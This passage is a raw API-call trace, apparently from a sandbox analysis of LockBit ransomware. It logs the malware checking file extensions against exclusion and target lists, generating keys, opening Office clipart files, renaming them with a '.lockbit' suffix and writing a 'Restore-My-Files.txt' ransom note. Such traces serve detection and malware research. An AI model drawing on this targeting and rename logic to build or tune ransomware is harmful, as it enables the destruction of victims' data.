(lpString1=".idx", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00195_.WMF") returned 1 [0106.684] lstrcmpiW (lpString1="ntldr", lpString2="BL00195_.WMF") returned 1 [0106.684] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00195_.WMF") returned 1 [0106.685] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00195_.WMF") returned 1 [0106.685] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00195_.WMF") returned -1 [0106.685] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00195_.WMF") returned 1 [0106.685] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00195_.WMF") returned 1 [0106.685] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.685] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned=".WMF" [0106.685] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.685] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.685] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.685] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.685] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.685] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.685] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.685] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.685] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.685] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.685] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.685] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.686] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.686] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.lockbit") returned 72 [0106.686] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.702] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.703] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.703] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8070) returned 1 [0106.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.704] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.706] malloc (_Size=0xa6) returned 0x77d800 [0106.706] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.707] free (_Block=0x77d800) [0106.707] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.707] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.707] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.707] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81891500, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81891500, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x2458, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00234_.WMF", cAlternateFileName="")) returned 1 [0106.707] lstrcmpiW (lpString1=".", lpString2="BL00234_.WMF") returned -1 [0106.708] lstrcmpiW (lpString1="..", lpString2="BL00234_.WMF") returned -1 [0106.708] PathFindExtensionW (pszPath="BL00234_.WMF") returned=".WMF" [0106.708] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.708] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.709] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.709] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.710] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.710] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.710] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.710] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.710] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.710] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.710] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.710] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.710] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.710] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00234_.WMF") returned 1 [0106.710] lstrcmpiW (lpString1="ntldr", lpString2="BL00234_.WMF") returned 1 [0106.710] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00234_.WMF") returned 1 [0106.710] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00234_.WMF") returned 1 [0106.710] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00234_.WMF") returned -1 [0106.710] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00234_.WMF") returned 1 [0106.710] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00234_.WMF") returned 1 [0106.711] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.711] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned=".WMF" [0106.711] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.711] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.711] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.712] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.712] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.lockbit") returned 72 [0106.712] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0106.713] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.713] malloc (_Size=0x40068) returned 0x3db00b8 [0106.713] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=9304) returned 1 [0106.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0106.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0106.715] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0108.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.318] malloc (_Size=0xa6) returned 0x77d800 [0108.318] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0108.347] free (_Block=0x77d800) [0108.347] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.347] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.347] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.347] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9438d00, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9438d00, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0xfb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00242_.WMF", cAlternateFileName="")) returned 1 [0108.347] lstrcmpiW (lpString1=".", lpString2="BL00242_.WMF") returned -1 [0108.347] lstrcmpiW (lpString1="..", lpString2="BL00242_.WMF") returned -1 [0108.347] PathFindExtensionW (pszPath="BL00242_.WMF") returned=".WMF" [0108.347] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.347] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.348] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.348] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00242_.WMF") returned 1 [0108.349] lstrcmpiW (lpString1="ntldr", lpString2="BL00242_.WMF") returned 1 [0108.349] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00242_.WMF") returned 1 [0108.349] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00242_.WMF") returned 1 [0108.349] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00242_.WMF") returned -1 [0108.349] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00242_.WMF") returned 1 [0108.349] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00242_.WMF") returned 1 [0108.349] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.349] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned=".WMF" [0108.349] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.349] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.349] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.350] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.lockbit") returned 72 [0108.350] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.350] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.350] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.350] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4024) returned 1 [0108.350] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.351] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.351] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0108.368] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.368] malloc (_Size=0xa6) returned 0x77d800 [0108.368] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0108.368] free (_Block=0x77d800) [0108.368] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.368] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.368] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 